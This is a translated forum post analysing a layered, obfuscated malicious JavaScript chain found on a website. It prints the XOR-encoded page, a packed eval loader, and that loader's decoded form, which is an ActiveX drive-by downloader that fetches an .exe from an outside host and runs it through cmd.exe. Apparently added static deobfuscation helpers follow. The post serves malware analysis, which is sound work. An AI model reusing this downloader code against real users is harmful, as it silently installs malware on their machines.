Original; please credit the source when reprinting. Script House
I just discovered a reverse-thinking method for decoding all kinds of JavaScript encryption. If you have a good method, please post it.
I recently found code that was encrypted through about five layers, and I will decode it down to the last layer without using a JavaScript decryption program.
Software used
1. Xunlei (Thunder), for downloading the web page: if you open the page directly it executes and you cannot view the source code.
2. Alternatively, use Firefox to browse the site directly; because of Firefox's particular characteristics, this browser is also recommended.
1. Target URL: http://www.e9ad.cn/pcdd/80-806.htm
Download this page with Thunder, or browse it with Firefox, and you obtain the following code.
<script language=javascript>var DFQC=function(a){return String.fromCharCode
(a^22)};document.write(DFQC(42) DFQC(126) DFQC(98) DFQC(123) DFQC(122) DFQC(40) DFQC(27)
DFQC(28) DFQC(54) DFQC(42) DFQC(126) DFQC(115) DFQC(119) DFQC(114) DFQC(40) DFQC(27) DFQC
(28) DFQC(42) DFQC(101) DFQC(117) DFQC(100) DFQC(127) DFQC(102) DFQC(98) DFQC(40) DFQC(27)
DFQC(28) DFQC(54) DFQC(112) DFQC(99) DFQC(120) DFQC(117) DFQC(98) DFQC(127) DFQC(121) DFQC
(120) DFQC(54) DFQC(117) DFQC(122) DFQC(115) DFQC(119) DFQC(100) DFQC(62) DFQC(63) DFQC
(109) DFQC(27) DFQC(28) DFQC(54) DFQC(69) DFQC(121) DFQC(99) DFQC(100) DFQC(117) DFQC(115)
DFQC(43) DFQC(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98)
DFQC(56) DFQC(116) DFQC(121) DFQC(114) DFQC(111) DFQC(56) DFQC(112) DFQC(127) DFQC(100)
DFQC(101) DFQC(98) DFQC(85) DFQC(126) DFQC(127) DFQC(122) DFQC(114) DFQC(56) DFQC(114)
DFQC(119) DFQC(98) DFQC(119) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121) DFQC
(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(121) DFQC(102) DFQC
(115) DFQC(120) DFQC(62) DFQC(63) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121)
DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(117) DFQC(122)
DFQC(121) DFQC(101) DFQC(115) DFQC(62) DFQC(63) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC
(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(98)
DFQC(127) DFQC(98) DFQC(122) DFQC(115) DFQC(43) DFQC(52) DFQC(113) DFQC(113) DFQC(52) DFQC
(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115)
DFQC(120) DFQC(98) DFQC(56) DFQC(116) DFQC(121) DFQC(114) DFQC(111) DFQC(56) DFQC(127)
DFQC(120) DFQC(120) DFQC(115) DFQC(100) DFQC(94) DFQC(66) DFQC(91) DFQC(90) DFQC(43) DFQC
(69) DFQC(121) DFQC(99) DFQC(100) DFQC(117) DFQC(115) DFQC(45) DFQC(27) DFQC(28) DFQC(54)
DFQC(107) DFQC(42) DFQC(57) DFQC(101) DFQC(117) DFQC(100) DFQC(127) DFQC(102) DFQC(98)
DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(98) DFQC(127) DFQC(98) DFQC(122) DFQC
(115) DFQC(40) DFQC(119) DFQC(114) DFQC(42) DFQC(57) DFQC(98) DFQC(127) DFQC(98) DFQC(122)
DFQC(115) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(126) DFQC(115) DFQC
(119) DFQC(114) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(116) DFQC(121) DFQC(114)
DFQC(111) DFQC(54) DFQC(121) DFQC(120) DFQC(122) DFQC(121) DFQC(119) DFQC(114) DFQC(43)
DFQC(117) DFQC(122) DFQC(115) DFQC(119) DFQC(100) DFQC(62) DFQC(63) DFQC(54) DFQC(98) DFQC
(121) DFQC(102) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(43) DFQC
(52) DFQC(38) DFQC(52) DFQC(54) DFQC(122) DFQC(115) DFQC(112) DFQC(98) DFQC(123) DFQC(119)
DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC
(100) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC
(127) DFQC(120) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC(116) DFQC(121) DFQC(98)
DFQC(98) DFQC(121) DFQC(123) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120)
DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(55)
DFQC(59) DFQC(59) DFQC(27) DFQC(28) DFQC(42) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC
(123) DFQC(115) DFQC(54) DFQC(120) DFQC(119) DFQC(123) DFQC(115) DFQC(43) DFQC(52) DFQC(95)
DFQC(39) DFQC(52) DFQC(54) DFQC(101) DFQC(100) DFQC(117) DFQC(43) DFQC(52) DFQC(46) DFQC
(38) DFQC(46) DFQC(38) DFQC(56) DFQC(126) DFQC(98) DFQC(123) DFQC(52) DFQC(54) DFQC(123)
DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(97) DFQC(127) DFQC(114) DFQC(98)
DFQC(126) DFQC(43) DFQC(52) DFQC(39) DFQC(52) DFQC(54) DFQC(123) DFQC(119) DFQC(100) DFQC
(113) DFQC(127) DFQC(120) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC
(43) DFQC(52) DFQC(39) DFQC(52) DFQC(54) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126)
DFQC(98) DFQC(43) DFQC(52) DFQC(46) DFQC(38) DFQC(52) DFQC(54) DFQC(97) DFQC(127) DFQC
(114) DFQC(98) DFQC(126) DFQC(43) DFQC(52) DFQC(46) DFQC(38) DFQC(52) DFQC(54) DFQC(101)
DFQC(117) DFQC(100) DFQC(121) DFQC(122) DFQC(122) DFQC(127) DFQC(120) DFQC(113) DFQC(43)
DFQC(52) DFQC(120) DFQC(121) DFQC(52) DFQC(54) DFQC(116) DFQC(121) DFQC(100) DFQC(114)
DFQC(115) DFQC(100) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC(112) DFQC(100) DFQC
(119) DFQC(123) DFQC(115) DFQC(116) DFQC(121) DFQC(100) DFQC(114) DFQC(115) DFQC(100) DFQC
(43) DFQC(52) DFQC(38) DFQC(52) DFQC(40) DFQC(42) DFQC(57) DFQC(127) DFQC(112) DFQC(100)
DFQC(119) DFQC(123) DFQC(115) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(59) DFQC(59) DFQC
(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(116) DFQC(121) DFQC(114) DFQC(111)
DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(126) DFQC(98) DFQC(123) DFQC
(122) DFQC(40) DFQC(54) DFQC(27) DFQC(28) DFQC(42) DFQC(69) DFQC(85) DFQC(68) DFQC(95) DFQC
(70) DFQC(66) DFQC(40) DFQC(54) DFQC(27) DFQC(28) DFQC(42) DFQC(55) DFQC(59) DFQC(59) DFQC
(54) DFQC(27) DFQC(28) DFQC(97) DFQC(127) DFQC(120) DFQC(114) DFQC(121) DFQC(97) DFQC(56)
DFQC(114) DFQC(115) DFQC(112) DFQC(119) DFQC(99) DFQC(122) DFQC(98) DFQC(69) DFQC(98) DFQC
(119) DFQC(98) DFQC(99) DFQC(101) DFQC(43) DFQC(52) DFQC(54) DFQC(54) DFQC(52) DFQC(45)
DFQC(54) DFQC(27) DFQC(28) DFQC(57) DFQC(57) DFQC(59) DFQC(59) DFQC(40) DFQC(54) DFQC(27)
DFQC(28) DFQC(42) DFQC(57) DFQC(69) DFQC(85) DFQC(68) DFQC(95) DFQC(70) DFQC(66) DFQC(40)
DFQC(27) DFQC(28) DFQC(42) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC(123) DFQC(115)
DFQC(54) DFQC(101) DFQC(100) DFQC(117) DFQC(43) DFQC(126) DFQC(98) DFQC(98) DFQC(102) DFQC
(44) DFQC(57) DFQC(57) DFQC(102) DFQC(121) DFQC(102) DFQC(56) DFQC(97) DFQC(108) DFQC(110)
DFQC(103) DFQC(111) DFQC(56) DFQC(117) DFQC(121) DFQC(123) DFQC(57) DFQC(33) DFQC(33) DFQC
(33) DFQC(57) DFQC(127) DFQC(120) DFQC(114) DFQC(115) DFQC(110) DFQC(56) DFQC(126) DFQC(98)
DFQC(123) DFQC(54) DFQC(97) DFQC(127) DFQC(114) DFQC(98) DFQC(126) DFQC(43) DFQC(38) DFQC
(54) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC(43) DFQC(38) DFQC(40)
DFQC(42) DFQC(57) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC(123) DFQC(115) DFQC(40)
DFQC(27) DFQC(28) DFQC(27) DFQC(28) '');
Now let's analyze how to decode this.
Look at document.write(DFQC(42) DFQC(126).....
In DFQC(42), DFQC is the decoder: var DFQC=function(a){return String.fromCharCode(a^22)}
I have also worked out my decoding code, below; this method can basically crack many similar codes. Take a look:
Code:
The decoded code obtained is as follows:
<head>
<script>
function clear(){
source=document.body.firstChild.data;
document.open();
document.close();
document.title="gg";
document.body.innerHTML=source;
}
</script>
</head>
<script>
</script>
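The DFQC layer above can also be stripped statically, without loading the page in a browser: the decoder is String.fromCharCode(a^22) applied to each DFQC(n) argument, so parsing the numbers out of the script text and XORing them gives the same result. This is an added example, not code from the original post; SAMPLE is constructed from the decoder definition and the first six calls shown above (they decode to "<html>"), and the '+' operators between the calls are assumed, since the listing above lost them.

```javascript
// Added example (not from the original post): strip the DFQC layer statically.
// SAMPLE is constructed from the decoder definition and the first six DFQC()
// calls of the listing above; the '+' between calls is assumed.
const SAMPLE = "var DFQC=function(a){return String.fromCharCode(a^22)};"
  + "document.write(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(122)+DFQC(40)+'');";

// Collect the numeric argument of every call to the named decoder function.
function extractCodes(src, fnName) {
  const re = new RegExp(fnName + '\\((\\d+)\\)', 'g');
  const codes = [];
  let m;
  while ((m = re.exec(src)) !== null) codes.push(Number(m[1]));
  return codes;
}

// Rebuild the string exactly as the decoder would, for a given XOR key.
function decodeXor(codes, key) {
  return codes.map(c => String.fromCharCode(c ^ key)).join('');
}

// Read the key straight from the decoder body ("a^22") when it is present.
function findKey(src) {
  const m = /fromCharCode\(\s*a\s*\^\s*(\d+)\s*\)/.exec(src);
  return m ? Number(m[1]) : null;
}

// Fallback for a renamed decoder or a hidden key: try every single-byte key and
// keep the ones that yield printable text starting with '<' (markup is expected).
function bruteForceKeys(codes) {
  const hits = [];
  for (let key = 0; key < 256; key++) {
    const s = decodeXor(codes, key);
    if (s.startsWith('<') && /^[\t\n\r\x20-\x7e]+$/.test(s)) hits.push(key);
  }
  return hits;
}

// Decode the sample end to end: explicit key if found, else brute force.
function decodeSample() {
  const codes = extractCodes(SAMPLE, 'DFQC');
  const key = findKey(SAMPLE) ?? bruteForceKeys(codes)[0];
  return decodeXor(codes, key);
}
```

Run against the full listing, the same functions yield the complete first-layer HTML as text, which can then be read instead of rendered.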
Second, lower down are http://www.e9ad.cn/pcdd/8080.htm and http://pop.*****.com/777/index.htm; at the bottom there is an iframe.
Downloading the code of the page http://pop.*****.com/777/index.htm with a download tool, you find the following:
charset='gb2312'>
Seeing this, you should recall the similar code found on many traffic-selling websites (that is, sites that sell traffic).
Third, continue analyzing http://cc.*****.com/wm/index.htm
Downloading this page with a download tool gives
OK, continuing, I downloaded the js file http://cc.*****.com/wm/1.js and got this code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}
('f 8(n){3 g=h.j()*n;k\'~5\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3 F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i){i=1}',
62,71,
'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|number|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribute||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|send|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFile|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))
When you see the code above you may think it cannot be decoded. I searched and found that decoding code for it actually exists, which could be analyzed here, but the purpose of this article is to avoid decoding programs, so I use the method below.
This method is one I came up with after a few seconds of thought; I hadn't thought of it before, and from now on everyone can use it more conveniently.
First put the code after eval into var str=......., then document.write(str); this gives the following code:
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try
{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute
("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject
("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject
("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var
F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder
(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile
(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath
(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}
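The same unpacking can be done statically, which is safer than swapping eval for document.write in a browser: the packer's prelude only substitutes base-a tokens from a dictionary, so that substitution can be reimplemented and the result read without ever executing it. This is an added example, not the post's own code; PACKED_P and PACKED_K are the arguments taken from the 1.js listing above, with the domain in the dictionary masked as ***** the way the post masks it.

```javascript
// Added example (not from the original post): unpack an eval(function(p,a,c,k,e,d){...})
// bundle with the same token substitution the packer's prelude performs, but with no eval.
// PACKED_P / PACKED_K are the arguments from the 1.js listing; the domain is masked as
// ***** exactly as the post masks it in the prose.
const PACKED_P = 'f 8(n){3 g=h.j()*n;k\'~5\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");'
  + '4.w("y","z:A-B-C-D-E");3 x=4.7("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");'
  + 'S.K=1;x.b("N",9,0);x.O();6=8(R);3 F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();'
  + 'S.Z(x.10);S.11(6,2);S.12();3 Q=4.7("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');'
  + 'Q.17(e,\' /c \'+6,"","b",0)}18(i){i=1}';
const PACKED_A = 62;
const PACKED_K = ('|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function'
  + '|number|Math||random|return|try|http||cc|*****|com|wm|mm|document|createElement|object'
  + '|setAttribute||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb'
  + '|Stream|type|||GET|send|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open'
  + '|Write|responseBody|SaveToFile|Close|Shell|Application|system32|cmd|ShellExecute|catch')
  .split('|');

// Value of one packer digit: 0-9, then a-z (10-35), then A-Z (36-61); -1 if not a digit.
function digitValue(ch) {
  return '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'.indexOf(ch);
}

// Parse a token as a base-a number, or return -1 if it is not one.
function tokenIndex(tok, a) {
  let n = 0;
  for (const ch of tok) {
    const v = digitValue(ch);
    if (v < 0 || v >= a) return -1;
    n = n * a + v;
  }
  return n;
}

// The packer replaces every \w+ token whose dictionary slot is non-empty; an empty
// slot means the token is already its own name (e.g. x, S, 0, 1), so it is kept.
function unpack(p, a, k) {
  return p.replace(/\b\w+\b/g, tok => {
    const i = tokenIndex(tok, a);
    return i >= 0 && i < k.length && k[i] ? k[i] : tok;
  });
}

// Unpack the 1.js payload; the result is the downloader source shown above.
function unpackSample() {
  return unpack(PACKED_P, PACKED_A, PACKED_K);
}
```

Because nothing is evaluated, the same function can be run on a packed sample from any page, and the recovered source inspected for the ActiveX, file-write and ShellExecute calls seen here.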
Then we find this http://cc.*****.com/wm/mm.exe. Download it first, and remember to check the size after downloading, since virus files are usually very small. Rename mm.exe to mm.exe.txt, open it, and you see the following code. Sigh,
<body>
<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>